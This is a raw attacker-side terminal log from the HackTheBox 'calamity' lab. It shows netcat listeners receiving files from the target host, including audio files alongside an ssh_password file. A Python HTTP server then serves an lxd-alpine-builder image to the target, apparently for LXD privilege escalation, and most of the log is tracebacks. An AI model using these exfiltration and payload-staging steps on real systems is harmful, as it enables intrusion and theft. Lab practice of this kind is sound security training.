root@parrot:~/hackthebox/calamity# cd xalvas-files/                            
root@parrot:~/hackthebox/calamity/xalvas-files# nc -nvlp 9999 > rick.wav       
Ncat: Version 7.80 ( https://nmap.org/ncat )                                   
Ncat: Listening on :::9999             
Ncat: Listening on 0.0.0.0:9999        
Ncat: Connection from 10.10.10.27.     
Ncat: Connection from 10.10.10.27:44982.                                       
root@parrot:~/hackthebox/calamity/xalvas-files# nc -nvlp 9999 > xouzouris.mp3  
Ncat: Version 7.80 ( https://nmap.org/ncat )                                   
Ncat: Listening on :::9999             
Ncat: Listening on 0.0.0.0:9999        
Ncat: Connection from 10.10.10.27.     
Ncat: Connection from 10.10.10.27:44984.                                       
root@parrot:~/hackthebox/calamity/xalvas-files# nc -nvlp 9999 > recov.wav      
Ncat: Version 7.80 ( https://nmap.org/ncat )                                   
Ncat: Listening on :::9999             
Ncat: Listening on 0.0.0.0:9999        
Ncat: Connection from 10.10.10.27.     
Ncat: Connection from 10.10.10.27:44986.                                       
root@parrot:~/hackthebox/calamity/xalvas-files# ls                             
recov.wav  rick.wav  ssh_password  xouzouris.wav                               
root@parrot:~/hackthebox/calamity/xalvas-files# cd /opt/lxd-alpine-builder/    
root@parrot:/opt/lxd-alpine-builder# ls
alpine-v3.11-i686-20200115_0409.tar.gz  LICENSE    xalvas@10.10.10.27          
build-alpine                            README.md                              
root@parrot:/opt/lxd-alpine-builder# python -m SimpleHTTPServer                
Serving HTTP on 0.0.0.0 port 8000 ...  
10.10.10.27 - - [15/Jan/2020 04:20:23] "GET /alpine-v3.11-i686-20200115_0409.tar.gz HTTP/1.1" 200 -                   
----------------------------------------                                       
Exception happened during processing of request from ('10.10.10.27', 55878)    
Traceback (most recent call last):     
  File "/usr/lib/python2.7/SocketServer.py", line 293, in _handle_request_noblock                 
    self.process_request(request, client_address)                              
  File "/usr/lib/python2.7/SocketServer.py", line 321, in process_request      
    self.finish_request(request, client_address)                               
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request       
    self.RequestHandlerClass(request, client_address, self)                    
  File "/usr/lib/python2.7/SocketServer.py", line 657, in __init__             
    self.finish()  
  File "/usr/lib/python2.7/SocketServer.py", line 716, in finish               
    self.wfile.close()                 
  File "/usr/lib/python2.7/socket.py", line 283, in close                      
    self.flush()   
  File "/usr/lib/python2.7/socket.py", line 307, in flush                      
    self._sock.sendall(view[write_offset:write_offset+buffer_size])            
error: [Errno 32] Broken pipe          
----------------------------------------                                       
10.10.10.27 - - [15/Jan/2020 04:35:58] "GET /alpine-v3.11-i686-20200115_0409.tar.gz HTTP/1.1" 200 -                   
^C^C----------------------------------------                                   
Exception happened during processing of request from ('10.10.10.27', 55880)    
Traceback (most recent call last):     
  File "/usr/lib/python2.7/SocketServer.py", line 293, in _handle_request_noblock                 
    self.process_request(request, client_address)                              
  File "/usr/lib/python2.7/SocketServer.py", line 321, in process_request      
    self.finish_request(request, client_address)                               
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request       
    self.RequestHandlerClass(request, client_address, self)                    
  File "/usr/lib/python2.7/SocketServer.py", line 657, in __init__             
    self.finish()  
  File "/usr/lib/python2.7/SocketServer.py", line 711, in finish               
    self.wfile.flush()                 
  File "/usr/lib/python2.7/socket.py", line 307, in flush                      
    self._sock.sendall(view[write_offset:write_offset+buffer_size])            
KeyboardInterrupt  
----------------------------------------                                       
10.10.10.27 - - [15/Jan/2020 04:54:36] "GET /alpine-v3.11-i686-20200115_0409.tar.gz HTTP/1.1" 200 -                   
^C----------------------------------------                                     
Exception happened during processing of request from ('10.10.10.27', 55882)    
Traceback (most recent call last):     
  File "/usr/lib/python2.7/SocketServer.py", line 293, in _handle_request_noblock                 
    self.process_request(request, client_address)                              
  File "/usr/lib/python2.7/SocketServer.py", line 321, in process_request      
    self.finish_request(request, client_address)                               
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request       
    self.RequestHandlerClass(request, client_address, self)                    
  File "/usr/lib/python2.7/SocketServer.py", line 657, in __init__             
    self.finish()  
  File "/usr/lib/python2.7/SocketServer.py", line 716, in finish               
    self.wfile.close()                 
  File "/usr/lib/python2.7/socket.py", line 283, in close                      
    self.flush()   
  File "/usr/lib/python2.7/socket.py", line 307, in flush                      
    self._sock.sendall(view[write_offset:write_offset+buffer_size])            
error: [Errno 32] Broken pipe          
----------------------------------------                                       
^CTraceback (most recent call last):   
  File "/usr/lib/python2.7/runpy.py", line 174, in _run_module_as_main         
    "__main__", fname, loader, pkg_name)                                       
  File "/usr/lib/python2.7/runpy.py", line 72, in _run_code                    
    exec code in run_globals           
  File "/usr/lib/python2.7/SimpleHTTPServer.py", line 235, in <module>         
    test()         
  File "/usr/lib/python2.7/SimpleHTTPServer.py", line 231, in test             
    BaseHTTPServer.test(HandlerClass, ServerClass)                             
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 610, in test               
    httpd.serve_forever()              
  File "/usr/lib/python2.7/SocketServer.py", line 231, in serve_forever        
    poll_interval) 
  File "/usr/lib/python2.7/SocketServer.py", line 150, in _eintr_retry         
    return func(*args)                 
KeyboardInterrupt  
root@parrot:/opt/lxd-alpine-builder# python -m SimpleHTTPServer                
Serving HTTP on 0.0.0.0 port 8000 ...  
^CTraceback (most recent call last):   
  File "/usr/lib/python2.7/runpy.py", line 174, in _run_module_as_main         
    "__main__", fname, loader, pkg_name)                                       
  File "/usr/lib/python2.7/runpy.py", line 72, in _run_code                    
    exec code in run_globals           
  File "/usr/lib/python2.7/SimpleHTTPServer.py", line 235, in <module>         
    test()         
  File "/usr/lib/python2.7/SimpleHTTPServer.py", line 231, in test             
    BaseHTTPServer.test(HandlerClass, ServerClass)                             
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 610, in test               
    httpd.serve_forever()              
  File "/usr/lib/python2.7/SocketServer.py", line 231, in serve_forever        
    poll_interval) 
  File "/usr/lib/python2.7/SocketServer.py", line 150, in _eintr_retry         
    return func(*args)                 
KeyboardInterrupt  
root@parrot:/opt/lxd-alpine-builder# python -m SimpleHTTPServer 80             
Serving HTTP on 0.0.0.0 port 80 ...    
10.10.10.27 - - [15/Jan/2020 04:55:49] "GET /alpine-v3.11-i686-20200115_0409.tar.gz HTTP/1.1" 200 -                   
^C^C----------------------------------------                                   
Exception happened during processing of request from ('10.10.10.27', 48918)    
Traceback (most recent call last):     
  File "/usr/lib/python2.7/SocketServer.py", line 293, in _handle_request_noblock                 
    self.process_request(request, client_address)                              
  File "/usr/lib/python2.7/SocketServer.py", line 321, in process_request      
    self.finish_request(request, client_address)                               
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request       
    self.RequestHandlerClass(request, client_address, self)                    
  File "/usr/lib/python2.7/SocketServer.py", line 657, in __init__             
    self.finish()  
  File "/usr/lib/python2.7/SocketServer.py", line 711, in finish               
    self.wfile.flush()                 
  File "/usr/lib/python2.7/socket.py", line 307, in flush                      
    self._sock.sendall(view[write_offset:write_offset+buffer_size])            
KeyboardInterrupt  
----------------------------------------                                       
^CTraceback (most recent call last):   
  File "/usr/lib/python2.7/runpy.py", line 174, in _run_module_as_main         
    "__main__", fname, loader, pkg_name)                                       
  File "/usr/lib/python2.7/runpy.py", line 72, in _run_code                    
    exec code in run_globals           
  File "/usr/lib/python2.7/SimpleHTTPServer.py", line 235, in <module>         
    test()         
  File "/usr/lib/python2.7/SimpleHTTPServer.py", line 231, in test             
    BaseHTTPServer.test(HandlerClass, ServerClass)                             
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 610, in test               
    httpd.serve_forever()              
  File "/usr/lib/python2.7/SocketServer.py", line 231, in serve_forever        
    poll_interval) 
  File "/usr/lib/python2.7/SocketServer.py", line 150, in _eintr_retry         
    return func(*args)                 
KeyboardInterrupt  
root@parrot:/opt/lxd-alpine-builder# exit                                      
